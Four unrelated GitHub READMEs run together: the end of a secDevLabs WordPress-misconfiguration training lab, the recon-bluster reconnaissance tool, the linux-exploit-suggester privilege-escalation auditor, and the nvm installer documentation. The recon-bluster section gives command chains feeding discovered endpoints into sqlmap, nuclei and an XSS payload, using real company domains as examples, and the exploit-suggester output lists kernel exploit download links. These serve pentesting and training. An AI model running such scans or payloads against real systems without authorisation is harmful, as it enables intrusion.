<img src="images/attack9.png"/>
</p>
---
## Secure this app
How would you mitigate this vulnerability? After your changes, an attacker should not be able to:
- See verbose error messages
- Sign in with default credentials
- See verbose tokens
- Find an outdated CMS version
Note: In this particular app, due to how it works, you can simply write down the changes you would make to mitigate those vulnerabilities and submit it as a pull request.
## PR solutions
[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+label%3A%22mitigation+solution+%F0%9F%94%92%22+label%3A%22Vuln+Wordpress+Misconfig%22)!
## Contributing
We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
[app]: http://localhost:8000
[wordlist]: https://github.com/danielmiessler/SecLists/blob/master/Passwords/UserPassCombo-Jay.txt
[wpscan]: https://wpscan.org/
[malicious code]: https://www.exploit-db.com/exploits/44949
[nikto]: https://cirt.net/Nikto2
[searchsploit]: https://www.exploit-db.com/searchsploit
|
# Summary
recon-bluster is a automated recon tools based on target domain. Combining a set of the best recon tools to enumeration endpoint and generate a target endpoint for further vulnerability scanning.
# Recon Workflow
![Alt text](images/xmind.png "recon workflow")
# Installation
```shell
git clone https://github.com/superzerosec/recon-bluster.git
cd recon-bluster
bash install.sh
```
# Usage
```shell
usage: recon-bluster.py [-h] [-d DOMAIN] [-l LIST]
optional arguments:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Target domain
-l LIST, --list LIST List of target domain saperated with new line
```
Recon single target on `tesla.com`
```shell
python3 recon-bluster.py -d tesla.com
```
For multiple target in file, create a `list.txt`
```shell
bugcrowd.com
tesla.com
uber.com
```
Recon multiple target on `list.txt`
```shell
python3 recon-bluster.py -l list.txt
```
# Tools Chaining
## SQLMAP
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; sqlmap -m $TARGET/target_sqli.txt --random-agent --batch
```
## NUCLEI
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; nuclei -silent -l $TARGET/subdomains_urls_httpx.txt -json -o $TARGET/subdomains_nuclei_vulnerabilities_$(date +%Y-%m-%d_%H:%M:%S).txt -H '"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4"' --severity low,medium,high,critical
```
## AIRIXSS
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; cat $TARGET/target_xss.txt | qsreplace '"><img src=x onerror=prompt(1)>' | airixss -payload '<img src=x onerror=prompt(1)>' | grep "31mVulnerable" | anew target_xss_airixss.txt
```
## SMAP
```shell
TARGET=tesla.com; python3 recon-bluster.py -d $TARGET; smap -iL $TARGET/subdomains.txt -oG $TARGET/subdomains_smap.txt
```
# Credit
* [assetfinder](https://github.com/tomnomnom/assetfinder)
* [subfinder](https://github.com/projectdiscovery/subfinder)
* [OWASP Amass](https://github.com/OWASP/Amass)
* [httpx](https://github.com/projectdiscovery/httpx)
* [waybackurls](https://github.com/tomnomnom/waybackurls)
* [gf](https://github.com/tomnomnom/gf)
* [anew](https://github.com/tomnomnom/anew)
* [gau](https://github.com/lc/gau)
* [hakrawler](https://github.com/hakluke/hakrawler)
* [unew](https://github.com/dwisiswant0/unew)
* [qsreplace](https://github.com/tomnomnom/qsreplace)
* [smap](https://github.com/s0md3v/Smap)
# Special Thanks
* [KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips)
|
## LES: Linux privilege escalation auditing tool
Quick download:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
## Purpose
LES tool is designed to assist in detecting security deficiencies for a given Linux kernel/Linux-based machine. It provides following functionality:
### Assessing kernel exposure on publicly known exploits
Tool assesses (using heuristics methods discussed in details [here](https://mzet-.github.io/2019/05/10/les-paper.html)) exposure of the given kernel to publicly known Linux kernel exploits. Example of tool output:
```
$ ./linux-exploit-suggester.sh
...
[+] [CVE-2017-16995] eBPF_verifier
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2017-1000112] NETIF_F_UFO
Details: http://www.openwall.com/lists/oss-security/2017/08/13/1
Exposure: probable
Tags: [ ubuntu=14.04{kernel:4.4.0-*} ],ubuntu=16.04{kernel:4.8.0-*}
Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/cve-2017-1000112/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
[+] [CVE-2016-8655] chocobo_root
Details: http://www.openwall.com/lists/oss-security/2016/12/06/1
Exposure: probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]
Download URL: https://www.exploit-db.com/download/40871
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
...
```
For each exploit, exposure is calculated. Following 'Exposure' states are possible:
- **Highly probable** - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
- **Probable** - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
- **Less probable** - additional manual analysis is needed to verify if kernel is affected.
- **Unprobable** - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
### Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of `--kernel` switch from [checksec.sh](http://www.trapkit.de/tools/checksec.html) tool by Tobias Klein. Example of tool output:
```
$ ./linux-exploit-suggester.sh --checksec
Mainline kernel protection mechanisms:
[ Disabled ] GCC stack protector support (CONFIG_HAVE_STACKPROTECTOR)
https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
[ Disabled ] GCC stack protector STRONG support (CONFIG_STACKPROTECTOR_STRONG)
https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
[ Enabled ] Low address space to protect from user allocation (CONFIG_DEFAULT_MMAP_MIN_ADDR)
https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
[ Disabled ] Restrict unprivileged access to kernel syslog (CONFIG_SECURITY_DMESG_RESTRICT)
https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
[ Enabled ] Randomize the address of the kernel image (KASLR) (CONFIG_RANDOMIZE_BASE)
https://github.com/mzet-/les-res/blob/master/features/kaslr.md
[ Disabled ] Hardened user copy support (CONFIG_HARDENED_USERCOPY)
https://github.com/mzet-/les-res/blob/master/features/hardened_usercopy.md
...
```
## Usage
Assess exposure of the Linux box to publicly known exploits:
```
$ ./linux-exploit-suggester.sh
```
Show state of security features on the Linux box:
```
$ ./linux-exploit-suggester.sh --checksec
```
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of `uname -a` command):
```
$ ./linux-exploit-suggester.sh --uname <uname-string>
```
For more usage examples, see [here](https://mzet-.github.io/2019/05/10/les-paper.html).
## Getting involved
You hopefully now know what LES is and what it can do for you. Now see what you can do for LES:
- Add newly published Linux privilege escalation exploits to it.
- Test existing exploits on various Linux distributions with multiple kernel versions, then document your findings in a form of `Tags` in LES, e.g. of a tag: `ubuntu=12.04{kernel:3.(2|5).0-(23|29)-generic}` which states: *tagged exploit was verifed to work correctly on Ubuntu 12.04 with kernels: 3.2.0-23-generic, 3.2.0-29-generic, 3.5.0-23-generic and 3.5.0-29-generic;*. With this tag added LES will automatically highlight and bump dynamic `Rank` of the exploit when run on Ubuntu 12.04 with one of listed kernel versions. This will help you (and others) during pentests to rapidly identify critically vulnerable Linux machines.
- Published exploits are often written only for PoC purposes only for one (or couple of) specific Linux distributions and/or kernel version(s). Pick sources of the exploit of choice and customize it to run on different kernel version(s). Then add your customized version of exploit as `ext-url` entry to LES and modify `Tags` to reflect newly added targets. See [this](https://ricklarabee.blogspot.com/2017/12/adapting-poc-for-cve-2017-1000112-to.html) article for an excellent example of adapting specific PoC exploit to different kernel versions.
- Conduct source code analysis of chosen kernel hardening security measure then add it to the `FEATURES` array (if not already there) and publish your analysis at: `https://github.com/mzet-/les-res/blob/master/features/<feature-name>.md`.
### Acknowledgments
[bcoles](https://github.com/bcoles/) for his excellent and frequent contributions to LES.
|
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.11-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
## Table of Contents
- [Installation](#installation)
- [Install script](#install-script)
- [Verify installation](#verify-installation)
- [Important Notes](#important-notes)
- [Git install](#git-install)
- [Manual Install](#manual-install)
- [Manual upgrade](#manual-upgrade)
- [Usage](#usage)
- [Long-term support](#long-term-support)
- [Migrating global packages while installing](#migrating-global-packages-while-installing)
- [Default global packages from file while installing](#default-global-packages-from-file-while-installing)
- [io.js](#iojs)
- [System version of node](#system-version-of-node)
- [Listing versions](#listing-versions)
- [.nvmrc](#nvmrc)
- [Deeper Shell Integration](#deeper-shell-integration)
- [zsh](#zsh)
- [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file)
- [License](#license)
- [Running tests](#running-tests)
- [Bash completion](#bash-completion)
- [Usage](#usage-1)
- [Compatibility Issues](#compatibility-issues)
- [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux)
- [Removal](#removal)
- [Manual Uninstall](#manual-uninstall)
- [Docker for development environment](#docker-for-development-environment)
- [Problems](#problems)
- [Mac OS "troubleshooting"](#mac-os-troubleshooting)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
## Installation
### Install script
To install or update nvm, you can use the [install script][2] using cURL:
```sh
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.11/install.sh | bash
```
or Wget:
```sh
wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.33.11/install.sh | bash
```
<sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub>
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
**Note:** You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it.
You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables.
Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash.
<sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub>
**Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type:
```sh
command -v nvm
```
simply close your current terminal, open a new terminal, and try verifying again.
**Note:** Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/creationix/nvm/issues/1782))
**Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:-
- your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again
- you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry.
If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code:
`source ~/.bashrc`
- For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576)
### Verify installation
To verify that nvm has been installed, do:
```sh
command -v nvm
```
which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary.
### Important Notes
If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work.
**Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us:
- [nvm-windows](https://github.com/coreybutler/nvm-windows)
- [nodist](https://github.com/marcelklehr/nodist)
**Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us:
- [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell
- [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup
- [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell
- [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish
**Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket:
- [[#900] [Bug] nodejs on FreeBSD may need to be patched ](https://github.com/creationix/nvm/issues/900)
- [nodejs/node#3716](https://github.com/nodejs/node/issues/3716)
**Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that:
- [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/)
**Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that:
- When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt`
- If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm)
- You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*`
Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue.
**Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade.
**Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article.
### Git install
If you have `git` installed (requires git v1.7.10+):
1. clone this repo in the root of your user profile
- `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm`
2. `cd ~/.nvm` and check out the latest version with `git checkout v0.33.11`
3. activate nvm by sourcing it from your shell: `. nvm.sh`
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
```
### Manual Install
For a fully manual install, create a folder somewhere in your filesystem with the `nvm.sh` file inside it. I put mine in `~/.nvm` and added the following to the `nvm.sh` file.
```sh
export NVM_DIR="$HOME/.nvm" && (
git clone https://github.com/creationix/nvm.git "$NVM_DIR"
cd "$NVM_DIR"
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
```
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
### Manual upgrade
For manual upgrade with `git` (requires git v1.7.10+):
1. change to the `$NVM_DIR`
1. pull down the latest changes
1. check out the latest version
1. activate the new version
```sh
(
cd "$NVM_DIR"
git fetch --tags origin
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
```
## Usage
To download, compile, and install the latest release of node, do this:
```sh
nvm install node
```
And then in any new shell just use the installed version:
```sh
nvm use node
```
Or you can just run it:
```sh
nvm run node --version
```
Or, you can run any arbitrary command in a subshell with the desired version of node:
```sh
nvm exec 4.2 node --version
```
You can also get the path to the executable to where it was installed:
```sh
nvm which 5.0
```
In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc:
- `node`: this installs the latest version of [`node`](https://nodejs.org/en/)
- `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/)
- `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`.
- `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability).
### Long-term support
Node has a [schedule](https://github.com/nodejs/LTS#lts_schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments:
- `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon`
- `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon`
- `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon`
- `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon`
- `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon`
- `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon`
- `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon`
Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported.
### Migrating global packages while installing
If you want to install a new version of Node.js and migrate npm packages from a previous version:
```sh
nvm install node --reinstall-packages-from=node
```
This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one.
You can also install and migrate npm packages from specific versions of Node like this:
```sh
nvm install 6 --reinstall-packages-from=5
nvm install v4.2 --reinstall-packages-from=iojs
```
### Default global packages from file while installing
If you have a list of default packages you want installed every time you install a new version we support that too. You can add anything npm would accept as a package argument on the command line.
```sh
# $NVM_DIR/default-packages
rimraf
object-inspect@1.0.2
stevemao/left-pad
```
### io.js
If you want to install [io.js](https://github.com/iojs/io.js/):
```sh
nvm install iojs
```
If you want to install a new version of io.js and migrate npm packages from a previous version:
```sh
nvm install iojs --reinstall-packages-from=iojs
```
The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js.
### System version of node
If you want to use the system-installed version of node, you can use the special default alias "system":
```sh
nvm use system
nvm run system --version
```
### Listing versions
If you want to see what versions are installed:
```sh
nvm ls
```
If you want to see what versions are available to install:
```sh
nvm ls-remote
```
To restore your PATH, you can deactivate it:
```sh
nvm deactivate
```
To set a default Node version to be used in any new shell, use the alias 'default':
```sh
nvm alias default node
```
To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`:
```sh
export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist
nvm install node
NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2
```
To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`:
```sh
export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist
nvm install iojs-v1.0.3
NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3
```
`nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions.
### .nvmrc
You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory).
Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line.
For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory:
```sh
$ echo "5.9" > .nvmrc
$ echo "lts/*" > .nvmrc # to default to the latest LTS version
$ echo "node" > .nvmrc # to default to the latest version
```
Then when you run nvm:
```sh
$ nvm use
Found '/path/to/project/.nvmrc' with version <5.9>
Now using node v5.9.1 (npm v3.7.3)
```
`nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized.
The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required.
### Deeper Shell Integration
You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new).
If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples.
#### zsh
##### Calling `nvm use` automatically in a directory with a `.nvmrc` file
Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an
`.nvmrc` file with a string telling nvm which node to `use`:
```zsh
# place this after nvm initialization!
autoload -U add-zsh-hook
load-nvmrc() {
local node_version="$(nvm version)"
local nvmrc_path="$(nvm_find_nvmrc)"
if [ -n "$nvmrc_path" ]; then
local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")")
if [ "$nvmrc_node_version" = "N/A" ]; then
nvm install
elif [ "$nvmrc_node_version" != "$node_version" ]; then
nvm use
fi
elif [ "$node_version" != "$(nvm version default)" ]; then
echo "Reverting to nvm default version"
nvm use default
fi
}
add-zsh-hook chpwd load-nvmrc
load-nvmrc
```
## License
nvm is released under the MIT license.
Copyright (C) 2010 Tim Caswell and Jordan Harband
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
## Running tests
Tests are written in [Urchin]. Install Urchin (and other dependencies) like so:
npm install
There are slow tests and fast tests. The slow tests do things like install node
and check that the right versions are used. The fast tests fake this to test
things like aliases and uninstalling. From the root of the nvm git repository,
run the fast tests like this:
npm run test/fast
Run the slow tests like this:
npm run test/slow
Run all of the tests like this:
npm test
Nota bene: Avoid running nvm while the tests are running.
## Bash completion
To activate, you need to source `bash_completion`:
```sh
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`).
### Usage
nvm:
> $ nvm <kbd>Tab</kbd>
```
alias deactivate install ls run unload
clear-cache exec list ls-remote unalias use
current help list-remote reinstall-packages uninstall version
```
nvm alias:
> $ nvm alias <kbd>Tab</kbd>
```
default
```
> $ nvm alias my_alias <kbd>Tab</kbd>
```
v0.6.21 v0.8.26 v0.10.28
```
nvm use:
> $ nvm use <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
nvm uninstall:
> $ nvm uninstall <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
## Compatibility Issues
`nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606))
The following are known to cause issues:
Inside `~/.npmrc`:
```sh
prefix='some/path'
```
Environment Variables:
```sh
$NPM_CONFIG_PREFIX
$PREFIX
```
Shell settings:
```sh
set -e
```
## Installing nvm on Alpine Linux
In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al).
Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that.
There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally.
If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell:
```sh
apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.11/install.sh | bash
```
The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries.
As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node).
## Removal
### Manual Uninstall
To remove nvm manually, execute the following:
```sh
$ rm -rf "$NVM_DIR"
```
Edit ~/.bashrc (or other shell resource config) and remove the lines below:
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
## Docker for development environment
To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository:
```sh
$ docker build -t nvm-dev .
```
This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`:
```sh
$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB
```
If you got no error message, now you can easily involve in:
```sh
$ docker run -it nvm-dev -h nvm-dev
nvm@nvm-dev:~/.nvm$
```
Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage.
For more information and documentation about docker, please refer to its official website:
- https://www.docker.com/
- https://docs.docker.com/
## Problems
- If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following:
curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume.
- Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43)
- After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source:
```sh
nvm install -s 0.8.6
```
- If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658))
## Mac OS "troubleshooting"
**nvm node version not found in vim shell**
If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run:
```shell
sudo chmod ugo-x /usr/libexec/path_helper
```
More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x).
[1]: https://github.com/creationix/nvm.git
[2]: https://github.com/creationix/nvm/blob/v0.33.11/install.sh
[3]: https://travis-ci.org/creationix/nvm
[4]: https://github.com/creationix/nvm/releases/tag/v0.33.11
